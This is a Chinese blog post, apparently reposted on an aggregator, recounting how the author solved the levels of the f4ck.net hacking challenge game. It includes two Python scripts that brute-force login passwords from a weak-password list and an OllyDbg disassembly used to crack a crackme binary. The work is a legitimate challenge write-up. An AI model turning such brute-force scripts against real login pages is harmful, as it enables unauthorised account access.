F4CK 游戏通关历险记
来源:互联网 发布:股票基本面分析知乎 编辑:程序博客网 时间:2024/06/10 03:22
游戏地址
声明:本博文意在记载作者自己的点滴,同时欢迎更多的朋友走上hackme和crackme这条路。
注意:尽量自己动手,尽量不给f4ck带来麻烦。
第一关
随便哪个抓包软件(我用的是WSExplorer),然后就发现了地址:
http://game.f4ck.net/jfasdsdlml.html
第二关
用python写了个脚本:
__author__="ouyang"__date__ ="$2013-1-15 14:39:34$" import httplibimport urllib if __name__ == "__main__": headers ={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding':'gzip,deflate', 'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Host':'game.f4ck.net', 'Referer':'http://game.f4ck.net/jfasdsdlml.html', 'User-Agent':'Mozilla/5.0(Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0', 'Content-Type':'application/x-www-form-urlencoded' } url = 'game.f4ck.net' path = '/login2.php' passfile = "weakpass.txt" inStream = file(passfile,"r") for tmpLine in inStream: params = urllib.urlencode({'log':'登录','password':tmpLine.strip('\n')}) conn = httplib.HTTPConnection(url) conn.request('POST',path,params,headers) response = conn.getresponse() if response.status == 302: print tmpLine break conn.close()inStream.close()
就跑出密码了:f9ck
第三关
在第二关代码上做了些修改:
__author__="ouyang"__date__ ="$2013-1-15 14:39:34$" import httplibimport urllibimport randomimport string if __name__ == "__main__": headers ={'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding':'gzip,deflate', 'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Host':'game.f4ck.net', 'Referer':'http://game.f4ck.net/jfasdsdlml.html', 'User-Agent':'Mozilla/5.0(Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0', 'Content-Type':'application/x-www-form-urlencoded' } url = 'game.f4ck.net' path = '/login.php' pass_file = "weakpass.txt" inStream = file(pass_file,"r") finished = False try: for line in inStream: for i in range(10): base = line.strip('\n') for j in range(5): data =base[:j]+str(i)+base[j:] #POST send package params =urllib.urlencode({'log':'%B5%C7%C2%BC','password':data}) conn =httplib.HTTPConnection(url) conn.request('POST',path,params,headers) response =conn.getresponse() print str(i),data,response.length #if error then length is29,if correct then !29 if response.length != 82: print "the key is: ",data finished = True break response.close() conn.close() if finished :break if finished : break except Exception , e: print e inStream.close()
跑出密码是:f4ck9
第四关
先用PEiD查壳,发现竟然没壳,OD架起,用“超级字符串参考”寻找Ascii字符串,然后在OK之前停住,随便逆向了下,而且特别简单。
指令如下:
00401053 |. C745 F8 D0070>MOV DWORD PTR SS:[EBP-8],7D00040105A |. C745 F4 B80B0>MOV DWORD PTR SS:[EBP-C],0BB800401061 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]00401064 |. 034D F8 ADD ECX,DWORD PTR SS:[EBP-8]00401067 |. 894D F0 MOV DWORD PTR SS:[EBP-10],ECX ; crackme.00429AA00040106A |. 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]0040106D |. 0355 F4 ADD EDX,DWORD PTR SS:[EBP-C]00401070 |. 8955 EC MOV DWORD PTR SS:[EBP-14],EDX ; crackme.00429AA000401073 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]00401076 |. 0345 FC ADD EAX,DWORD PTR SS:[EBP-4]00401079 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX0040107C |. 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]0040107F |. 81C1 F4010000 ADD ECX,1F400401085 |. 894D F0 MOV DWORD PTR SS:[EBP-10],ECX ; crackme.00429AA000401088 |. 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18]0040108B |. 81EA F4010000 SUB EDX,1F400401091 |. 8955 E8 MOV DWORD PTR SS:[EBP-18],EDX ; crackme.00429AA000401094 |. C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],00040109B |. C645 E0 4B MOV BYTE PTR SS:[EBP-20],4B0040109F |. C645 DC 4E MOV BYTE PTR SS:[EBP-24],4E004010A3 |. 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]004010A6 |. 3B45 F4 CMP EAX,DWORD PTR SS:[EBP-C]004010A9 |. 75 0D JNZ SHORT crackme.004010B8004010AB |. 68 38704200 PUSH crackme.00427038 ; /NO004010B0 |. E8 5B020000 CALL crackme.00401310 ; \crackme.00401310004010B5 |. 83C4 04 ADD ESP,4004010B8 |> 50 PUSH EAX004010B9 |. 58 POP EAX ; ntdll.7C930738004010BA |. 51 PUSH ECX ; crackme.00429AA0004010BB |. 59 POP ECX ; ntdll.7C930738004010BC |. B8 64000000 MOV EAX,64004010C1 |. 05 C8000000 ADD EAX,0C8004010C6 |. BB 04000000 MOV EBX,4004010CB |. 03C3 ADD EAX,EBX004010CD |. 33C9 XOR ECX,ECX ; crackme.00429AA0004010CF |. 85C9 TEST ECX,ECX ; crackme.00429AA0004010D1 |. 74 0D JE SHORT crackme.004010E0004010D3 |. 68 34704200 PUSH crackme.00427034 ; /OK004010D8 |. E8 33020000 CALL crackme.00401310 ; \crackme.00401310004010DD |. 83C4 04 ADD ESP,4004010E0 |> 03C3 ADD EAX,EBX004010E2 |. BB 0A000000 MOV EBX,0A004010E7 |. 40 INC EAX004010E8 |. 43 INC EBX004010E9 |. 90 NOP004010EA |. 90 NOP004010EB |. 90 NOP004010EC |. 83C0 0A ADD EAX,0A004010EF |. 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10] ;这里是关键004010F2 |. 3B4D EC CMP ECX,DWORD PTR SS:[EBP-14] ;比较EBP-10和EBP-14地址的内容004010F5 |. 75 28 JNZ SHORT crackme.0040111F004010F7 |. 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]004010FA |. 3B55 E8 CMP EDX,DWORD PTR SS:[EBP-18]004010FD |. 75 20 JNZ SHORT crackme.0040111F004010FF |. 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]00401102 |. 3B45 E8 CMP EAX,DWORD PTR SS:[EBP-18]00401105 |. 75 18 JNZ SHORT crackme.0040111F
大概讲的是X + 7D0 + 1F4 == 7D0 + BB8 ,然后简单运算下就出来了X是9C4H
很容易就得到答案为 2500(D)
进入 2500.php
恭喜通关。
- F4CK 游戏通关历险记
- 【贪心】游戏通关
- 【游戏通关】解题报告
- githug游戏--通关文档
- FC经典游戏通关视频
- 玩游戏的人的“通关方法”
- 智力游戏《奇妙的反射镜》通关
- 全球只有4个人通关的游戏
- 程序员的游戏2048通关截图
- (难度:35%)untrusted游戏通关攻略
- 「Githug」Git 游戏通关流程
- 「Githug」Git 游戏通关流程
- 「Githug」Git 游戏通关流程
- 读书笔记《游戏改变世界》《通关,游戏设计之道》
- 上海严肃游戏产业筹备开发仿真网游高楼历险记
- Unity5.0 RPG角色扮演历险类游戏之 森林历险记
- 史上最恐怖FLASH游戏咒怨(附通关攻略)
- 我也爆机了:冰人通关游戏截屏
- halcon 窗口图像颜色和原始图片颜色不对应
- Metro UI风格配色方案
- Encountered 1 errors during the transfer
- url带参数跳转乱码问题
- SDL初学者的自荐
- F4CK 游戏通关历险记
- HGE教程翻译(5)
- 常用排序算法使用
- 带标号的连通图计数
- koobee学生在校写的《银证转帐系统》的通信代码
- Ctex的常用操作归纳
- HGE教程翻译(6)
- javascript Object.extend的用法
- SICP Solutions for 1.1~1.5